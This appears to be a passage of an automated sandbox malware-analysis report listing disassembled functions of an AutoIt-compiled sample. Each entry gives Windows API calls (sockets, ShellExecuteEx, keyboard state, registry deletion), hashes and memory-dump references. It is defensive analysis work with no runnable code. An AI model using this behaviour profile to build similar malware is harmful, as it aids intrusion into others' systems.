                          • Instruction Fuzzy Hash: D9C18C74504712DFD714EF64E849AABBBE4BF95310F10892DF899972A2DB30EC45CB82
                          Function 00586FB3 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                          Download Yara Rule
                          APIs
                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005870B0
                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 005870D1
                          • WSAGetLastError.WSOCK32(00000000), ref: 005870E4
                          • htons.WSOCK32(?,?,?,00000000,?), ref: 0058719A
                          • inet_ntoa.WSOCK32(?), ref: 00587157
                            • Part of subcall function 0056B2CD: _strlen.LIBCMT ref: 0056B2D7
                            • Part of subcall function 0056B2CD: _memmove.LIBCMT ref: 0056B2F9
                          • _strlen.LIBCMT ref: 005871F4
                          • _memmove.LIBCMT ref: 0058725D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                          • String ID:
                          • API String ID: 3619996494-0
                          • Opcode ID: 7848ab3765b08d84d7300db79ea774eeeee907e8354fc94ee0472d42b9ccc8de
                          • Instruction ID: 0e85f268404c543adc90fc76310134be0a92ce29868e2d2ca9ca6d5d2b1c6b2e
                          • Opcode Fuzzy Hash: 7848ab3765b08d84d7300db79ea774eeeee907e8354fc94ee0472d42b9ccc8de
                          • Instruction Fuzzy Hash: BC81D275108201ABD310FB64DC8AE6BBBA8FFC8714F144918F956AB2D2DB30ED41CB91
                          Function 00511800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 021346539a557dad9e464effe16b6b3427b00146e680a2d22178d03cef473786
                          • Instruction ID: 209cd889fca2f8232b4f861607d0073dcf49324b77c32432834898970558af16
                          • Opcode Fuzzy Hash: 021346539a557dad9e464effe16b6b3427b00146e680a2d22178d03cef473786
                          • Instruction Fuzzy Hash: 52715D30900509FFEB04CF58CC49AEEBF79FF86314F148599FA15AA291C730AA91DB64
                          Function 0059B73E Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                          Download Yara Rule
                          APIs
                          • IsWindow.USER32(01235480), ref: 0059B7D8
                          • IsWindowEnabled.USER32(01235480), ref: 0059B7E4
                          • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0059B8C8
                          • SendMessageW.USER32(01235480,000000B0,?,?), ref: 0059B8FF
                          • IsDlgButtonChecked.USER32(?,?), ref: 0059B93C
                          • GetWindowLongW.USER32(01235480,000000EC), ref: 0059B95E
                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059B976
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                          • String ID:
                          • API String ID: 4072528602-0
                          • Opcode ID: 2f36e689639bb0060d36ab2b6b627381e5ac6dc2b673f3fda8c71a2a44cc7c40
                          • Instruction ID: 74c27f718c1c14062cfbd565bcbeb03ed9e2745c386ae81145f0094b46fdc14c
                          • Opcode Fuzzy Hash: 2f36e689639bb0060d36ab2b6b627381e5ac6dc2b673f3fda8c71a2a44cc7c40
                          • Instruction Fuzzy Hash: 40719E74A01208AFFF209F94DAD4FAA7FB9FF89300F14445AE955972A1C731A855DB10
                          Function 0058F8CF Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0058F8F9
                          • _memset.LIBCMT ref: 0058F9C2
                          • ShellExecuteExW.SHELL32(?), ref: 0058FA07
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • GetProcessId.KERNEL32(00000000), ref: 0058FA7E
                          • CloseHandle.KERNEL32(00000000), ref: 0058FAAD
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                          • String ID: @
                          • API String ID: 3522835683-2766056989
                          • Opcode ID: d667b9932b3ab2aac5e019873916aed9fdcb456ce5b236df4b690b32480c71cf
                          • Instruction ID: 66f755e2fba0320c51c7e33e7b80a1ea916e87ef55b10c7e6d417e0342024d4c
                          • Opcode Fuzzy Hash: d667b9932b3ab2aac5e019873916aed9fdcb456ce5b236df4b690b32480c71cf
                          • Instruction Fuzzy Hash: 95619D75A0061A9FCB14EF94D4859AEBBF5FF89310F108469E859AB391CB30AD81CF90
                          Function 005715B8 Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 005715F7
                          • GetKeyboardState.USER32(?), ref: 0057160C
                          • SetKeyboardState.USER32(?), ref: 0057166D
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057169B
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 005716BA
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571700
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00571723
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                          • Instruction ID: 4c947e2c19e3d69e8f6abb7151399b041cd1fca8e32d4ac06e5742cc5177e182
                          • Opcode Fuzzy Hash: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                          • Instruction Fuzzy Hash: AD51D5A0504BD13DFB36462C9C59BB67FA9BB06304F0CC589E1DD498C2C298EC98F758
                          Function 005713D1 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 00571410
                          • GetKeyboardState.USER32(?), ref: 00571425
                          • SetKeyboardState.USER32(?), ref: 00571486
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005714B2
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005714CF
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00571513
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00571534
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                          • Instruction ID: 49c69637d241600866dd71b2576ca8830f6c5bdb91a6e2161032a7158febc17d
                          • Opcode Fuzzy Hash: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                          • Instruction Fuzzy Hash: 4D51E4B0554AD13DFB3682389C55BB6BFAA7B46700F0CC489E1DE464C2D294EC88FB58
                          Function 00575A25 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _wcsncpy$LocalTime
                          • String ID:
                          • API String ID: 2945705084-0
                          • Opcode ID: 5682bca27628ff3676444c9bfe3c12aea6ac90fbb8b9a8bdbbf231eed059275b
                          • Instruction ID: ca95e3df062819270840758f04c1bb07c2e05dcb8ea40c5fa0fcc1a1f0a17027
                          • Opcode Fuzzy Hash: 5682bca27628ff3676444c9bfe3c12aea6ac90fbb8b9a8bdbbf231eed059275b
                          • Instruction Fuzzy Hash: 73419EA5C2061575CB11EBA4888E9DFBBA8BF44310F508866F519E3221F774E309C7A9
                          Function 005739D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005739F7,?), ref: 00574A4D
                            • Part of subcall function 00574A30: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005739F7,?), ref: 00574A66
                          • lstrcmpiW.KERNEL32(?,?), ref: 00573A17
                          • _wcscmp.LIBCMT ref: 00573A33
                          • MoveFileW.KERNEL32(?,?), ref: 00573A4B
                          • _wcscat.LIBCMT ref: 00573A93
                          • SHFileOperationW.SHELL32(?), ref: 00573AFF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 1377345388-1173974218
                          • Opcode ID: 9b4b8bea0c7e6b6602944229e89828fa42c5cb42495ac91840401e09155ad56e
                          • Instruction ID: 7d7eb6965d6f8df9e87a0548b93ddf345ae53838f0b655894b1653254302f805
                          • Opcode Fuzzy Hash: 9b4b8bea0c7e6b6602944229e89828fa42c5cb42495ac91840401e09155ad56e
                          • Instruction Fuzzy Hash: 0941AF71508345AEC751EB60E846AEBBBECBF89350F00492EB48DC3151EB34D689EB56
                          Function 0059767E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00597697
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0059773E
                          • IsMenu.USER32(?), ref: 00597756
                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0059779E
                          • DrawMenuBar.USER32 ref: 005977B1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert_memset
                          • String ID: 0
                          • API String ID: 3866635326-4108050209
                          • Opcode ID: ec90e2773cd42d9d99bfcd9d19dd0fad379aa15a2dff32a37d67c52c5d86e3e0
                          • Instruction ID: 7d6271df02e9a17c22829e72e36fff6a743e5d5d42cc36e5283e49253f6148dc
                          • Opcode Fuzzy Hash: ec90e2773cd42d9d99bfcd9d19dd0fad379aa15a2dff32a37d67c52c5d86e3e0
                          • Instruction Fuzzy Hash: AE412774A14209AFDF20DF94D884EAABBF8FB09354F04806AED1597361E730AD55DFA0
                          Function 005913CA Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 005913F9
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00591423
                          • FreeLibrary.KERNEL32(00000000), ref: 005914DA
                            • Part of subcall function 005913CA: RegCloseKey.ADVAPI32(?), ref: 00591440
                            • Part of subcall function 005913CA: FreeLibrary.KERNEL32(?), ref: 00591492
                            • Part of subcall function 005913CA: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005914B5
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059147D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                          • String ID:
                          • API String ID: 395352322-0
                          • Opcode ID: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                          • Instruction ID: bc6777bf1caf3a5f78c7d54a2cd5f8aff98b6833aecba6b2249c85b66032b818
                          • Opcode Fuzzy Hash: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                          • Instruction Fuzzy Hash: B3311C7191011ABFDF15DF90DC89EFFBBBCFB19340F000169E516A2140EB749E499AA4
                          Function 005966BA Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 005966D9
                          • GetWindowLongW.USER32(01235480,000000F0), ref: 0059670C
                          • GetWindowLongW.USER32(01235480,000000F0), ref: 00596741
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00596773
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0059679D
                          • GetWindowLongW.USER32(?,000000F0), ref: 005967AE
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005967C8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: fe183e2126052c97f80a737cc99342c7fcebfec877bd99bca3033b26b68432c8
                          • Instruction ID: 1b72128285e285bd1f4fdb61abcf1ec64fbd583dd1977d4d8e1614e1739430a4
                          • Opcode Fuzzy Hash: fe183e2126052c97f80a737cc99342c7fcebfec877bd99bca3033b26b68432c8
                          • Instruction Fuzzy Hash: 0B313634604150AFDF20CF98DC84F553BE1FB9A758F1901A6F6018B2B2CB71AC58EB51
                          Function 0056E06A Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E0AD
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E0D3
                          • SysAllocString.OLEAUT32(00000000), ref: 0056E0D6
                          • SysAllocString.OLEAUT32(?), ref: 0056E0F4
                          • SysFreeString.OLEAUT32(?), ref: 0056E0FD
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E122
                          • SysAllocString.OLEAUT32(?), ref: 0056E130
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: e8940088e5e8a55c21f1f7aa0457bae8defeb8c9d05640c361dad91275814f94
                          • Instruction ID: 77704c50b2458b41306160c63e58022fd182d07e1eda6c0ef115ce8bdee58f26
                          • Opcode Fuzzy Hash: e8940088e5e8a55c21f1f7aa0457bae8defeb8c9d05640c361dad91275814f94
                          • Instruction Fuzzy Hash: 30219236601219AF9F10DFB8CC89CBB7BECFB0A360B048525FA55DB290D6709C45D760
                          Function 00586623 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0058823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00586676
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586685
                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005866BE
                          • connect.WSOCK32(00000000,?,00000010), ref: 005866C7
                          • WSAGetLastError.WSOCK32 ref: 005866D1
                          • closesocket.WSOCK32(00000000), ref: 005866FA
                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00586713
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                          • String ID:
                          • API String ID: 910771015-0
                          • Opcode ID: 82b4c513ade651e54f8cdf55a640a0500341afc64b189c02374012a0d6c40fe9
                          • Instruction ID: 6e718cca3b6b692b2a8112fc43d07144a9e90dd356c5fb98362989edc296970b
                          • Opcode Fuzzy Hash: 82b4c513ade651e54f8cdf55a640a0500341afc64b189c02374012a0d6c40fe9
                          • Instruction Fuzzy Hash: DD31C471600109AFEF10AF64DC89BBE7BADFB45764F004419FD05A72D1EB74AC449BA1
                          Function 0056E143 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E188
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E1AE
                          • SysAllocString.OLEAUT32(00000000), ref: 0056E1B1
                          • SysAllocString.OLEAUT32 ref: 0056E1D2
                          • SysFreeString.OLEAUT32 ref: 0056E1DB
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E1F5
                          • SysAllocString.OLEAUT32(?), ref: 0056E203
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: d4466d902b63bd82795fea77a752c741105f3de744d80ae20c06421e3007cb5e
                          • Instruction ID: 477c1881ef2f0a2a2684165819c63f1bc3fc84f0b30a10069ab0038c990f3bd7
                          • Opcode Fuzzy Hash: d4466d902b63bd82795fea77a752c741105f3de744d80ae20c06421e3007cb5e
                          • Instruction Fuzzy Hash: E8215639605205AF9B109FA8DC8DDBA7BECFB5A360B008125FA15CB2E0D674DC45DBA4
                          Function 0056FBFC Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: ce045ab5cd9a1b75e3f7b8ff84284cbfc93dcb8684d492d9bb1ff23b1cc73ae1
                          • Instruction ID: 17d967c0e28bec9083d7349c2731dd27c1a0902abf443618df2fcf069dbd4be2
                          • Opcode Fuzzy Hash: ce045ab5cd9a1b75e3f7b8ff84284cbfc93dcb8684d492d9bb1ff23b1cc73ae1
                          • Instruction Fuzzy Hash: C921F53294851A66E321BA25AC06FBB7BD8FF92300F504836FC4587192EB91AD8193A5
                          Function 005979BA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597A1F
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00597A2C
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00597A37
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597A46
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597A52
